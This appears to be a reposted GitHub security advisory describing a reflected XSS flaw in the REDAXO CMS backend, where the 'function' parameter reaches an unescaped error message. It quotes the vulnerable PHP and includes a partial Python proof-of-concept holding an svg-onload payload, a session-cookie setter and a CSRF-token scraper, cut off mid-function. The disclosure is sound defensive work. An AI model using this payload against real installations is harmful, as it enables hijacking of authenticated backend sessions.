GHSA-xq4j-g85q-wf97
### Summary A **reflected XSS** vulnerability has been identified in the REDAXO backend. The `function` parameter is concatenated into an API error message and rendered without HTML escaping. --- ### Details **Root cause** User input `function` is injected into an exception message, then rendered by `rex_view::error()` which delegates to `rex_view::message()` without HTML escaping. **Vulnerable code (`redaxo/src/core/lib/packages/api_package.php`) :** ```php $function = rex_request('function', 'string'); throw new rex_api_exception('Unknown package function "' . $function . '"!'); ``` **Sink (`redaxo/src/core/lib/view.php`) :** ```php return '<div class="' . $cssClassMessage . '">' . $message . '</div>'; ``` **Source -> sink flow** * Source: `function` (GET) * Propagation: concatenated into the exception message * Sink: rendered via `rex_view::error()` -> `rex_view::message()` without escaping **Authentication required:** yes (backend session) --- ### PoC - Exploit ```python #!/usr/bin/env python3 import re import urllib.parse import requests TARGET_URL = "http://poc.local/" BACKEND_PATH = "redaxo/index.php" # A valid backend PHP session id (must belong to a user who can access the Packages page) SESSION_ID = "xxxxxxxxxxxxxxxxxxxxx https://github.com/user-attachments/assets/94093253-abd6-4380-ad46-6b748541a598 " VERIFY_SSL = False TIMEOUT = 15 PAYLOAD = '\\"><svg/onload=alert("Pwned")>' def build_backend_url() -> str: base = TARGET_URL.rstrip('/') return f"{base}/{BACKEND_PATH.lstrip('/')}" def extract_api_csrf(html_text: str) -> str: m = re.search(r'rex-api-call=package[^\"]+_csrf_token=([^&\"\s]+)', html_text) if not m: raise RuntimeError("CSRF token for rex_api_call=package was not found in the page HTML.") return m.group(1) def set_session_cookie(session: requests.Session) -> None: parsed = urllib.parse.urlparse(TARGET_URL) if parsed.hostname: session.cookies.set("PHPSESSID", SESSION_ID, domain=
Properties
- ghsa_id
- GHSA-xq4j-g85q-wf97
- severity
- low
- summary
- REDAXO has reflected XSS backend packages API via function parameter (CSRF token required)
- cve_id
- GHSA-xq4j-g85q-wf97
- is_ghsa_only
- true
- ghsa_published
- 2026-04-10T19:40:42Z
- source_url
- https://github.com/advisories/GHSA-xq4j-g85q-wf97
- ghsa_updated
- 2026-04-10T19:40:45Z
Related Entities (4)
VULNERABLE_TO (1)
AFFECTS (1)
HAS_WEAKNESS (1)
REPORTED_BY (1)
Explore deeper with Ninja Signal's threat intelligence graph